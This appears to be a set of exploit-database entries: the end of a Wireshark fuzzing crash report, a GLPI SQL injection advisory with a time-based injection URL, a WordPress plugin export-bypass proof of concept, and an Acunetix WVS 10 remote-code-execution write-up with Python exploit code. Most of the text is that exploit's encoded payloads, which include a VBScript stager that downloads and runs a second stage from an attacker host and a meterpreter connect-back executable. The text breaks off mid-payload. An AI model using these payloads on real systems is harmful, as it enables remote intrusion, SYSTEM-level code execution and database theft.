#10 0x7feb044cc8ff in call_dissector_with_data wireshark/epan/packet.c:2777:8
#11 0x7feb06c26d60 in dissect_zbee_apf wireshark/epan/dissectors/packet-zbee-aps.c:1705:9
#12 0x7feb044df911 in call_dissector_through_handle wireshark/epan/packet.c:656:8
#13 0x7feb044d157a in call_dissector_work wireshark/epan/packet.c:731:9
#14 0x7feb044dba1e in call_dissector_only wireshark/epan/packet.c:2764:8
#15 0x7feb044cc8ff in call_dissector_with_data wireshark/epan/packet.c:2777:8
#16 0x7feb06c264fa in dissect_zbee_aps wireshark/epan/dissectors/packet-zbee-aps.c:1055:13
#17 0x7feb044df911 in call_dissector_through_handle wireshark/epan/packet.c:656:8
#18 0x7feb044d157a in call_dissector_work wireshark/epan/packet.c:731:9
#19 0x7feb044dba1e in call_dissector_only wireshark/epan/packet.c:2764:8
#20 0x7feb044cc8ff in call_dissector_with_data wireshark/epan/packet.c:2777:8
#21 0x7feb06c30910 in dissect_zbee_nwk_full wireshark/epan/dissectors/packet-zbee-nwk.c:732:9
#22 0x7feb06c2a19a in dissect_zbee_nwk wireshark/epan/dissectors/packet-zbee-nwk.c:762:9
#23 0x7feb06c2bfb7 in dissect_zbee_nwk_heur wireshark/epan/dissectors/packet-zbee-nwk.c:409:5
#24 0x7feb044d9bbb in dissector_try_heuristic wireshark/epan/packet.c:2390:7
#25 0x7feb056bb91b in dissect_ieee802154_common wireshark/epan/dissectors/packet-ieee802154.c:1524:21
#26 0x7feb056ad56a in dissect_ieee802154_nofcs wireshark/epan/dissectors/packet-ieee802154.c:751:5
#27 0x7feb044df911 in call_dissector_through_handle wireshark/epan/packet.c:656:8
#28 0x7feb044d157a in call_dissector_work wireshark/epan/packet.c:731:9
#29 0x7feb044d0d4d in dissector_try_uint_new wireshark/epan/packet.c:1190:9
#30 0x7feb052e2105 in dissect_frame wireshark/epan/dissectors/packet-frame.c:492:11
#31 0x7feb044df911 in call_dissector_through_handle wireshark/epan/packet.c:656:8
#32 0x7feb044d157a in call_dissector_work wireshark/epan/packet.c:731:9
#33 0x7feb044dba1e in call_dissector_only wireshark/epan/packet.c:2764:8
#34 0x7feb044cc8ff in call_dissector_with_data wireshark/epan/packet.c:2777:8
#35 0x7feb044cbcd4 in dissect_record wireshark/epan/packet.c:539:3
#36 0x7feb0447edb9 in epan_dissect_run_with_taps wireshark/epan/epan.c:376:2
#37 0x52ef3f in process_packet wireshark/tshark.c:3727:5
#38 0x52830c in load_cap_file wireshark/tshark.c:3483:11
#39 0x51e67c in main wireshark/tshark.c:2192:13
0x7feb11013620 is located 32 bytes to the left of global variable 'ett_zbee_zcl_appl_ctrl_func' defined in 'packet-zbee-zcl-general.c:11520:13' (0x7feb11013640) of size 128
0x7feb11013620 is located 0 bytes to the right of global variable 'ett_zbee_zcl_pwr_prof_enphases' defined in 'packet-zbee-zcl-general.c:10389:13' (0x7feb110135e0) of size 64
SUMMARY: AddressSanitizer: global-buffer-overflow wireshark/epan/dissectors/packet-zbee-zcl-general.c:10745:25 in dissect_zcl_pwr_prof_enphsschednotif
Shadow bytes around the buggy address:
0x0ffde21fa670: f9 f9 f9 f9 00 00 00 f9 f9 f9 f9 f9 00 00 00 00
0x0ffde21fa680: 00 00 00 00 f9 f9 f9 f9 00 00 00 00 00 00 00 00
0x0ffde21fa690: f9 f9 f9 f9 00 00 00 00 00 00 00 00 00 00 00 00
0x0ffde21fa6a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 f9 f9 f9
0x0ffde21fa6b0: f9 f9 f9 f9 00 00 04 f9 f9 f9 f9 f9 00 00 00 00
=>0x0ffde21fa6c0: 00 00 00 00[f9]f9 f9 f9 00 00 00 00 00 00 00 00
0x0ffde21fa6d0: 00 00 00 00 00 00 00 00 f9 f9 f9 f9 00 f9 f9 f9
0x0ffde21fa6e0: f9 f9 f9 f9 00 00 00 00 00 00 00 00 00 00 00 00
0x0ffde21fa6f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0ffde21fa700: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0ffde21fa710: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==695==ABORTING
--- cut ---
The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=12358. Attached are two files which trigger the crash.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39750.zip
Advisory ID: HTB23301
Product: GLPI
Vendor: INDEPNET
Vulnerable Version(s): 0.90.2 and probably prior
Tested Version: 0.90.2
Advisory Publication: April 8, 2016 [without technical details]
Vendor Notification: April 8, 2016
Vendor Patch: April 11, 2016
Public Disclosure: April 29, 2016
Vulnerability Type: SQL Injection [CWE-89]
Risk Level: High
CVSSv3 Base Score: 7.1 [CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L]
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )
------------------------------------------------------------------------
-----------------------
Advisory Details:
High-Tech Bridge Security Research Lab discovered a high-risk SQL injection vulnerability in a popular Information Resource Manager (IRM) system GLPI. IRM systems are usually used for management and audit of software packages, providing ITIL-compliant service desk. The vulnerability allows remote non-authenticated attacker to execute arbitrary SQL queries, read and write data to the application's database and completely compromise the vulnerable system.
The vulnerability exists due to insufficient filtration of user-supplied data passed via the "page_limit" HTTP GET parameter to "/ajax/getDropdownConnect.php" PHP script. A remote unauthenticated attacker can alter present SQL query, inject and execute arbitrary SQL command in application's database.
Below is a simple SQL Injection exploit, which uses time-based exploitation technique. The page will load time will be significantly higher if MySQL version is 5.X or superior:
http://[host]/ajax/getDropdownConnect.php?fromtype=Computer&itemtype=Com
puter&page=1&page_limit=1%20PROCEDURE%20analyse%28%28select%20extractval
ue%28rand%28%29,concat%280x3a,%28IF%28MID%28version%28%29,1,1%29%20LIKE%
205,%20BENCHMARK%285000000,SHA1%281%29%29,1%29%29%29%29%29,1%29
------------------------------------------------------------------------
-----------------------
Solution:
Update to GLPI 0.90.3
More Information:
http://www.glpi-project.org/spip.php?page=annonce&id_breve=358&lang=en
https://github.com/glpi-project/glpi/issues/581
------------------------------------------------------------------------
-----------------------
References:
[1] High-Tech Bridge Advisory HTB23301 - https://www.htbridge.com/advisory/HTB23301 - SQL Injection in GLPI.
[2] GLPI - http://www.glpi-project.org - GLPI is the Information Resource Manager with an additional Administration Interface.
[3] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
[4] ImmuniWeb® - https://www.htbridge.com/immuniweb/ - web security platform by High-Tech Bridge for on-demand and continuous web application security, vulnerability management, monitoring and PCI DSS compliance.
[5] Free SSL/TLS Server test - https://www.htbridge.com/ssl/ - check your SSL implementation for PCI DSS and NIST compliance. Supports all types of protocols.
------------------------------------------------------------------------
-----------------------
Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.
# Exploit Title: WordPress Export to Ghost Unrestricted Export Download
# Date: 28-04-2016
# Software Link: https://wordpress.org/plugins/ghost
# Exploit Author: Josh Brody
# Contact: http://twitter.com/joshmn
# Website: http://josh.mn/
# Category: webapps
1. Description
Any visitor can download the Ghost Export file because of a failure to check if an admin user is properly authenticated. Assume all versions < 0.5.6 are vulnerable.
2. Proof of Concept
http://example.com/wp-admin/tools.php?ghostexport=true&submit=Download+Ghost+file
File will be downloaded.
3. Solution:
Update to version 0.5.6
https://downloads.wordpress.org/plugin/ghost.0.5.6.zip
'''
Acunetix WVS 10 - Remote command execution (SYSTEM privilege)
- Author: Daniele Linguaglossa
Overview
=========
Acunetix WVS 10 [1] is an enterprise web vulnerability scanner developer by Acunetix Inc.
Two major flaws exists in the last version of Acunetix, these bug allow a remote attacker,
to execute command in the context of application with SYSTEM privilege.
Details
==========
A first flaw exists in the way Acunetix render some html elements inside gui, in fact it
uses jscript.dll without any concert about unsafe ActiveX object such as WScript.shell.
If acunetix trigger a vulnerability during a scan session it saves a local html with the
content of html page, so is possibile to trigger a fake vulnerability and insert a js
which trigger the remote command execution.
The second flaw it's about the Acunetix scheduler [2], the scheduler just allow to scan
websites programmatically without any user interaction, is possible to schedule scan
via the web interface on 127.0.0.1:8183 .
like any scan Acunetix, will perform some tests on the targeted Host before real scan,
these test are executed upon some script into folder
C:\ProgramData\Acunetix WVS 10\Data\Scripts
icacls show a bad privileges in this folder, so any user (even guest) will be able to
replace these custom checks with own ones (Remember first flaw with jscript.dll) :D
C:\ProgramData\Acunetix WVS 10\Data>icacls Scripts
Scripts Everyone:(OI)(CI)(M)
Everyone:(I)(OI)(CI)(M)
NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
BUILTIN\Administrators:(I)(OI)(CI)(F)
CREATOR OWNER:(I)(OI)(CI)(IO)(F)
BUILTIN\Users:(I)(OI)(CI)(RX)
BUILTIN\Users:(I)(CI)(WD,AD,WEA,WA) <---- UNSAFE [3]
Elaborazione completata per 1 file. Elaborazione non riuscita per 0 file
C:\ProgramData\Acunetix WVS 10\Data>
With this two flaws in mind i wrote a small exploit which is able to obtain RCE via
a meterpreter shell, anyway there are some requirement:
1) Target must have VBS script interpreter
2) Target must have the scheduler service
3) Target must be Windows
Exploit
==========
https://github.com/dzonerzy/acunetix_0day
https://www.youtube.com/watch?v=gWcRlam59Fs (video proof)
Solution
==========
Jscript should be used with limited ActiveX, and permission on C:\ProgramData\Acunetix WVS 10\Data
must be fixed!
Footnotes
_________
[1] http://www.acunetix.com/
[2] http://www.acunetix.com/support/docs/wvs/scheduling-scans/
[3] https://support.microsoft.com/it-it/kb/919240
'''
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Acunetix 0day SYSTEM Remote Command Execution by Daniele Linguaglossa
This PoC exploit 2 vulnerability in Acunetix core , the first one is a RCE (Remote Command Exec) and the second one is
a LPE (Local Privilege Escalation).
All credits for this exploit goes to Daniele Linguaglossa
"""
from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
from random import randint
from threading import Thread
from time import sleep
import binascii
import sys
import base64
import os
server = None
def gen_random_name(size):
alphabet = "abcdefghilmnopqrstuvzABCDEFGHILMNOPQRSTUVZ0123456789"
name = ""
for i in range(0, size):
name += alphabet[randint(0, len(alphabet) - 1)]
return name + ".vbs"
def ip2b(ip):
return "".join(binascii.hexlify(chr(int(t))) for t in ip.split("."))
def postexploitation():
print "[*] Sleeping 1 minutes to elevate privileges...ZzZz"
sleep(70) # 2 minutes
global server
print "[!] Stopping server !"
server.shutdown()
print "[!] Exploit successful wait for session!"
# param URL,FILENAME
PAYLOAD_DOWNLOAD_EXEC = "dHNraWxsIHd2cw0KJGE9JycnDQogU2V0IGZzbyA9IENyZWF0ZU9iamVjdCgiU2NyaXB0aW5nLkZpbGVTeXN0ZW1PYmpl" \
"Y3QiKQ0KIFNldCB3c2hTaGVsbCA9IENyZWF0ZU9iamVjdCggIldTY3JpcHQuU2hlbGwiICkNCiBTZXQgT3V0cCA9IFdz" \
"Y3JpcHQuU3Rkb3V0DQogU2V0IEZpbGUgPSBXU2NyaXB0LkNyZWF0ZU9iamVjdCgiTWljcm9zb2Z0LlhNTEhUVFAiKQ0K" \
"IEZpbGUuT3BlbiAiR0VUIiwgImh0dHA6Ly8lcy9zdGFnZTIiLCBGYWxzZQ0KIE15RmlsZSA9IHdzaFNoZWxsLkV4cGFu" \
"ZEVudmlyb25tZW50U3RyaW5ncyggIiVzIiApKyJcJXMiDQogRmlsZS5TZW5kDQogU2V0IEJTID0gQ3JlYXRlT2JqZWN0" \
"KCJBRE9EQi5TdHJlYW0iKQ0KIEJTLnR5cGUgPSAxDQogQlMub3Blbg0KIEJTLldyaXRlIEZpbGUuUmVzcG9uc2VCb2R5" \
"DQogQlMuU2F2ZVRvRmlsZSBNeUZpbGUsIDINCiB3c2hTaGVsbC5ydW4gIndzY3JpcHQgIitNeUZpbGUNCiBmc28uRGVs" \
"ZXRlRmlsZShXc2NyaXB0LlNjcmlwdEZ1bGxOYW1lKQ0KICcnJw0KICRwdGggPSAoZ2V0LWl0ZW0gZW52OlRFTVApLlZh" \
"bHVlKyJcc3RhZ2VyLnZicyI7DQogZWNobyAkYSA+ICRwdGgNCiB3c2NyaXB0ICRwdGg="
# param connect back IP
PAYLOAD_METERPETRER = "4d5a90000300000004000000ffff0000b80000000000000040000000000000000000000000000000000000000000000" \
"0000000000000000000000000800000000e1fba0e00b409cd21b8014ccd21546869732070726f6772616d2063616e6" \
"e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000504500004c010300e4fb66ef000" \
"0000000000000e0000f030b01023800020000000e000000000000001000000010000000200000000040000010000000" \
"020000040000000100000004000000000000000040000000020000463a0000020000000000200000100000000010000" \
"0100000000000001000000000000000000000000030000064000000000000000000000000000000000000000000000" \
"0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000" \
"00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002e7" \
"465787400000028000000001000000002000000020000000000000000000000000000200030602e64617461000000" \
"900a000000200000000c000000040000000000000000000000000000200030e02e6964617461000064000000003000" \
"000002000000100000000000000000000000000000400030c000000000000000000000000000000000b800204000ff" \
"e090ff253830400090900000000000000000ffffffff00000000ffffffff0000000000000000000000000000000000" \
"0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000" \
"0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000" \
"0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000" \
"0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000" \
"0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000" \
"0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000" \
"0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000" \
"0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000" \
"0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000" \
"0000000000000000000000000000000000000000000000000000000000000000000000009090909090909090909090" \
"90909090909090909090909090909090909033c0680810400064ff30648920fce8820000006089e531c0648b50308b" \
"520c8b52148b72280fb74a2631ffac3c617c022c20c1cf0d01c7e2f252578b52108b4a3c8b4c1178e34801d1518b59" \
"2001d38b4918e33a498b348b01d631ffacc1cf0d01c738e075f6037df83b7d2475e4588b582401d3668b0c4b8b581" \
"c01d38b048b01d0894424245b5b61595a51ffe05f5f5a8b12eb8d5d6833320000687773325f54684c772607ffd5b89" \
"001000029c454506829806b00ffd56a0568%s680200115c89e6505050504050405068ea0fdfe0ffd5976a105657689" \
"9a57461ffd585c0740aff4e0875ece8610000006a006a0456576802d9c85fffd583f8007e368b366a4068001000005" \
"66a006858a453e5ffd593536a005653576802d9c85fffd583f8007d225868004000006a0050680b2f0f30ffd557687" \
"56e4d61ffd55e5eff0c24e971ffffff01c329c675c7c3bbf0b5a2566a0053ffd5190f4da8a063058eceb8f7b69074c" \
"4e814a3cae54e8172c60ead9604f2e86b0522895f543ebf148fad021d6146ace15f4ae3dbf55185e896fcaede21b0f" \
"db55831cbcfb72949f584986c13ebc8dd35971d7cee480354c83bf909ab61c53b4412733e4cd8dc788890915d41c0b" \
"2e06b529fe28c90a777a1a2ff95dc2a6bd697544d0462c01750e7f053c3ee2e1277d13515df7d3dc5ee57419630faf" \
"f6c066e12a8ef76cb84891bb64b347b905ceaea1850bc52542cb5a967d538e70d8e7c5335132befb4f87450a5ecdf2" \
"7ec89b1ed56e6beb044a950a8022ab5d46d5ba6f37655d35296ade2911292b5179f53d148dffee01672f90f1d82c22" \
"b5e253c2637ed99e71e796953a070483bb13cab540c00873b6f5788a1a6e58663cf9cf2ff46b92cbcdad9215a101fb" \
"54c71d2112151a19faec99fe5256fced9417f9673ddbb87439860eccedf31e528837cda1251b974f2808bdfc70cafa" \
"e32fb6335cdda22e19e64fde514b779dc932bb8249f8d8f260fd457b719980bb069a1ed560e2c74d85182c3aacd499" \
"df5dab0e0a0cee9e1da02cff7b89aac3f99de68badc83c9acf3c7518cf1578a58c131e1f3f36d393a7da0979f48115" \
"9d687cd9e3d5bc9fe3d34b9c7aa362be497402f21045d1aa7b871e773facc169649d8f64c0ac91d2feb85063169af8" \
"87973643f41f9b5c38b01cb2eb327e17d1d0f7f5e8693022c729f69b83723df61b9617f533cf919740edbb92ca86f9" \
"f1db8cdf696531559d41193f2356414df49a8e22790a7cb174079b5273c485e252296d690796649048410e29fc8a4d" \
"3d3384a98beb5bca12574510183cbaa49f1eee2e7712df55312a40c18e636efe4e7066034e50060e3dcfc5354dc9d9" \
"4b570a97d0b47eadc715effc165f9660797fc3ed75d5940262419d75ea5670a029774fa83b5818a7d46a9764de62be" \
"e019444d30589d5d778499aaa0b3d10e7897d26fc5e446eb358c7067df52636d8a2ba7340f40e0c263522bb494500d" \
"c73585ee9208e29ac7cdf591316712f1624116dc48ebe2c9fa5743e1e4519f82b8be65db56c09e6ef563286050decd" \
"f9b327481b045b2073ea4e52ba5c6bb066c2f02709effd1db019cba7b8b682f16749d12ca8c89230edbbecfd59bf51" \
"11ea1e6c9ed24ec62bcc37bff84195329a97a41354be5f297dd0edc868edbd35c528f79b9debf6a132b0ee1c140151" \
"a90f0c6145149b01e6f55b7e6cc24f015a0f98627fee12834bcf368458827c4c824b1968aa4df58188c5909a95df1f" \
"288c88326ee731d240159bba27397cc8b0fe4995ac6445a9033279af56f156d22416b8915f5b64a1acca60e4c1c6b8" \
"f33af7431ed674bd62b6b26613cad5f9c9d395c95ee9acc56aacd0f4ea4e198fb6e061d012c91ffa99ecdc1510099f" \
"8a4d4fc45273e6687be92c729b719692bb5e197083c4f4b77a1df988cd81141686743fe0e1ace050dec96c0fd8d75e" \
"7182ea3cfc0f13c5cf804a8264c67166495837b6da837bb7e382527f63db2f94c75af6c855162aeb3b8a2c362819b9" \
"b1d586db76faa0c06346149d2c88379cf186e36056669d4e7cc433cb8205dd0d058c2f6ae74111eeaa6a5883b14e74" \
"482d130a665e53b6e89020d600be481779ee7b97631b897608d6933c65fcfc4f630dabe2d0dbad0af7c614d81b679d" \
"619ce6a7eefbf94664a40e4772f540dc1964a979f4c25e125844c2a7075f6a6f5fae46dada35d3e83f82d03f87b11e" \
"cfb4bf6636d727cf99dae040b8dd3c7abcdb98eabb7e71b56348ce6a3c635299efebc81690288bbab0f6cad2ebfd2a" \
"a3d7aa74724b97be8ff3f360017970203ed71039a06799828f0455620fe432ef1dbb79cb87478c6d67e177fa72cbc0" \
"c1422a65197e33ee6a4b314992beb18cbaa3bcd00f43cc2749ed61c8d8cb38f512bee5bdb4d4574c0c56b91da064bd" \
"5c358dab92d2431b3c90938b4d0ec9661c2e9c98942585466ff7f0a7a5b5b56d825673b46966750cedce33eb0de118" \
"c5c4211b1bfc6d297d5d48205ac40a8f47b78988807fa9d312465c1c080b158c01267965e443de442716d3fe8ac029" \
"7640ef6d5632eaa784cf2b2b7a884d0589c93d69f8f8d7c6dc2b75a0825c0c5e892268cf3af3843004dc68dd05d367" \
"6ac0b218d9adc3ecca734fe7fa61de3272584ed349fffa669175cd8a873b72b7dce3cb4a8e8afa8ddbba2039219220" \
"6e9dc808a2ac3f2b6909e71321437b8979f26b9a8bda1fde661229544cb34ebc3ce7a4e0c05d340ba65457c67c3d61" \
"5d249af5d333ab3894045480fa8bb3b6c75a41ed9dd00ec8367c68cd41b2b03caa30fc527a00d94b3c25620813ac9d" \
"522e6e86cfee45a4f711171ec17f167abc0c4abb6c80de587bb790a1f83b9428d8380832a8216a6b8ea47cac624a24" \
"ca171c95ebb6d81bd7676eff464d56436d32b66bb3d190e44e66beb412bd7d5d8978d7e0e93bb0e9f08944a6c45b4a" \
"b5e493e0dd1491352d8078b0a3bae30bc2c145bc4e5f9dfd9b457d5dd8ff9c635031b02e7f3b8927b09460b983883a" \
"dbb42bdff6f8c017b5096ce7d5a72ab620504be21555aa86871ee9e4887657b8e72d8813b429428596839d00c3e44f" \
"fe5297ce95fc340278d1d805370c54f64615db34797f523f0a4cd2523d10d1a1b62146051db23668bc482d802b66bf" \
"962f511ec6af7204cbb8d474204bf5c9e52ce0cfbd6298cf96f619a5d64827ba3284b25135965a9062f3cd7eb93745" \
"390e9cc983c9a54ec731699bbda53958382cbb2e2ecd3247b18e5c3d64755c0d1e112e8375b5795afdfee8b69879c8" \
"6597f79b6df2624dbe59557e8d13918c2d28c91c3a4f49a8682b62648259d118ffa02b2218efa031b45fd54c0b8d14" \
"23d494b0a5da8e97ec345e17f9db32e9bec5cbcc36357b4ba8e7b8ccddc192d360d99a1e805dedc0ecadca15a0334f" \
"680b0a9e91e12698ba69d27d86b2394c3d91682194ba312e8aef801a9ebc8722af9e8bd1180c0eed3137bfe109b06c" \
"a442777eae4e1a145302152777da0a0a1decef0e0c73f2709cdb61360961eb1fc47cec9a893b9a8b2ec9f5a7fcce3e" \
"178b459a54d9c5e40c6aada77896a7ee9054324019fe61e954c60dfd7bc895011c951e09fc195e779b71fc33833cdb" \
"a5fe76ceb9a7b6ba5a39ed2e80c5d91b15cef0e1f5cb956b90e6db947fa45a4ae0e668b72a056dd29ea81c8b3aa126" \
"b35d40c6dfa042cbd19c42b7ef44e6ef7b35952dbc796097530a04a71a3c116e99bf4a4ae8199685cc7e1e9f03a1ce" \
"a8eb6d579e1e2ae0800000000000000000000000000000000000000000000000000000000000000000000000000000" \
"0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000" \
"0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000" \
"0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000" \
"0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000" \
"0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000" \
"0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000" \
"0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000" \
"00000002c3000000000000000000000543000003830000000000000000000000000000000000000000000000000000" \
"040300000000000000000000040300000000000009c004578697450726f63657373000000003000004b45524e454c3" \
"3322e646c6c00000000000000000000000000000000000000000000000000000000000000000000000000000000000" \
"0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000" \
"0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000" \
"0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000" \
"0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000" \
"0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000" \
"0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000" \
"000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000" \
"000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000" \
"17aa9f565fccd8ce423701840cda9828320ce06749de816ae27196bce0849d1b494f89ffd49"
# param CMD => PAYLOAD_DOWNLOAD_EXEC
EXPLOIT_STAGE_1 = "PGh0bWw+PGhlYWQ+PC9oZWFkPjxib2R5PjxzY3JpcHQ+d2luZG93LmFsZXJ0ID0genl4O3dpbmRvdy5wcm9tcHQgPSB6eXg7d" \
"2luZG93LmNvbmZpcm0gPSB6eXg7d2luZG93LmNhbGxlZCA9IDA7ZnVuY3Rpb24genl4KCl7d2luZG93LmNhbGxlZCA9IDE7dm" \
"FyIHh5ej0iJXMiO2V2YWwoZnVuY3Rpb24ocCxhLGMsayxlLGQpe2U9ZnVuY3Rpb24oYyl7cmV0dXJuIGMudG9TdHJpbmcoMzY" \
"pfTtpZighJycucmVwbGFjZSgvXi8sU3RyaW5nKSl7d2hpbGUoYy0tKXtkW2MudG9TdHJpbmcoYSldPWtbY118fGMudG9TdHJp" \
"bmcoYSl9az1bZnVuY3Rpb24oZSl7cmV0dXJuIGRbZV19XTtlPWZ1bmN0aW9uKCl7cmV0dXJuJ1xcdysnfTtjPTF9O3doaWxlK" \
"GMtLSl7aWYoa1tjXSl7cD1wLnJlcGxhY2UobmV3IFJlZ0V4cCgnXFxiJytlKGMpKydcXGInLCdnJyksa1tjXSl9fXJldHVybi" \
"BwfSgnNSAwPTYgNCgiMy4xIik7MC4yKFwnNyAvOCBkIC9lICIiICJjIiAtYiA5IC1hICJmIlwnKTsnLDE2LDE2LCdceDczXHg" \
"2OFx4NjVceDZjXHg2Y3xceDUzXHg2OFx4NjVceDZjXHg2Y3xceDcyXHg3NVx4NmV8XHg1N1x4NTNceDYzXHg3Mlx4NjlceDcw" \
"XHg3NHxceDQxXHg2M1x4NzRceDY5XHg3Nlx4NjVceDU4XHg0Zlx4NjJceDZhXHg2NVx4NjNceDc0fHZhcnxuZXd8XHg2M1x4N" \
"mRceDY0fEN8Tm9ybWFsfFx4NjVceDZlXHg2M1x4NmZceDY0XHg2NVx4NjRceDYzXHg2Zlx4NmRceDZkXHg2MVx4NmVceDY0fH" \
"dpbmRvd1x4NzNceDc0XHg3OVx4NmNceDY1fFx4NzBceDZmXHg3N1x4NjVceDcyXHg3M1x4NjhceDY1XHg2Y1x4NmN8XHg3M1x" \
"4NzRceDQxXHg1Mlx4NzR8QnwkJCcucmVwbGFjZSgiJCQiLHh5eikuc3BsaXQoJ3wnKSwwLHt9KSk7ZG9jdW1lbnQuYm9keS5p" \
"bm5lckhUTUw9JzQwNCBOb3QgZm91bmQnO308L3NjcmlwdD4lczxzY3JpcHQ+aWYgKHdpbmRvdy5jYWxsZWQgPT0gMCl7enl4K" \
"Ck7fTwvc2NyaXB0PjwvYm9keT48L2h0bWw+"
LOGIN_FORM = "PHN0eWxlPg0KYm9keXsNCiAgbWFyZ2luOiAwcHg7DQogIHBhZGRpbmc6IDBweDsNCiAgYmFja2dyb3VuZDogIzFhYmM5ZDsNCn0NCg" \
"0KaDF7DQogIGNvbG9yOiAjZmZmOw0KICB0ZXh0LWFsaWduOiBjZW50ZXI7DQogIGZvbnQtZmFtaWx5OiBBcmlhbDsNCiAgZm9udC13Z" \
"WlnaHQ6IG5vcm1hbDsNCiAgbWFyZ2luOiAyZW0gYXV0byAwcHg7DQp9DQoub3V0ZXItc2NyZWVuew0KICBiYWNrZ3JvdW5kOiAjMTMy" \
"MDJjOw0KICB3aWR0aDogOTAwcHg7DQogIGhlaWdodDogNTQwcHg7DQogIG1hcmdpbjogNTBweCBhdXRvOw0KICBib3JkZXItcmFkaXV" \
"zOiAyMHB4Ow0KICAtbW96LWJvcmRlci1yYWRpdXM6IDIwcHg7DQogIC13ZWJraXQtYm9yZGVyLXJhZGl1czogMjBweDsNCiAgcG9zaXR" \
"pb246IHJlbGF0aXZlOw0KICBwYWRkaW5nLXRvcDogMzVweDsNCn0NCg0KLm91dGVyLXNjcmVlbjpiZWZvcmV7DQogIGNvbnRlbnQ6IC" \
"IiOw0KICBiYWNrZ3JvdW5kOiAjM2U0YTUzOw0KICBib3JkZXItcmFkaXVzOiA1MHB4Ow0KICBwb3NpdGlvbjogYWJzb2x1dGU7DQogI" \
"GJvdHRvbTogMjBweDsNCiAgbGVmdDogMHB4Ow0KICByaWdodDogMHB4Ow0KICBtYXJnaW46IGF1dG87DQogIHotaW5kZXg6IDk5OTk" \
"7DQogIHdpZHRoOiA1MHB4Ow0KICBoZWlnaHQ6IDUwcHg7DQp9DQoub3V0ZXItc2NyZWVuOmFmdGVyew0KICBjb250ZW50OiAiIjsNCi" \
"AgYmFja2dyb3VuZDogI2VjZjBmMTsNCiAgd2lkdGg6IDkwMHB4Ow0KICBoZWlnaHQ6IDg4cHg7DQogIHBvc2l0aW9uOiBhYnNvbHV0Z" \
"TsNCiAgYm90dG9tOiAwcHg7DQogIGJvcmRlci1yYWRpdXM6IDBweCAwcHggMjBweCAyMHB4Ow0KICAtbW96LWJvcmRlci1yYWRpdXM6" \
"IDBweCAwcHggMjBweCAyMHB4Ow0KICAtd2Via2l0LWJvcmRlci1yYWRpdXM6IDBweCAwcHggMjBweCAyMHB4Ow0KfQ0KDQouc3RhbmR" \
"7DQogIHBvc2l0aW9uOiByZWxhdGl2ZTsgIA0KfQ0KDQouc3RhbmQ6YmVmb3Jlew0KICBjb250ZW50OiAiIjsNCiAgcG9zaXRpb246IG" \
"Fic29sdXRlOw0KICBib3R0b206IC0xNTBweDsNCiAgYm9yZGVyLWJvdHRvbTogMTUwcHggc29saWQgI2JkYzNjNzsNCiAgYm9yZGVyL" \
"WxlZnQ6IDMwcHggc29saWQgdHJhbnNwYXJlbnQ7DQogIGJvcmRlci1yaWdodDogMzBweCBzb2xpZCB0cmFuc3BhcmVudDsNCiAgd2lkd" \
"Gg6IDIwMHB4Ow0KICBsZWZ0OiAwcHg7DQogIHJpZ2h0OiAwcHg7DQogIG1hcmdpbjogYXV0bzsNCn0NCg0KLnN0YW5kOmFmdGVyew0K" \
"ICBjb250ZW50OiAiIjsNCiAgcG9zaXRpb246IGFic29sdXRlOw0KICB3aWR0aDogMjYwcHg7DQogIGxlZnQ6IDBweDsNCiAgcmlnaHQ6" \
"IDBweDsNCiAgbWFyZ2luOiBhdXRvOw0KICBib3JkZXItYm90dG9tOiAzMHB4IHNvbGlkICNiZGMzYzc7DQogIGJvcmRlci1sZWZ0OiA" \
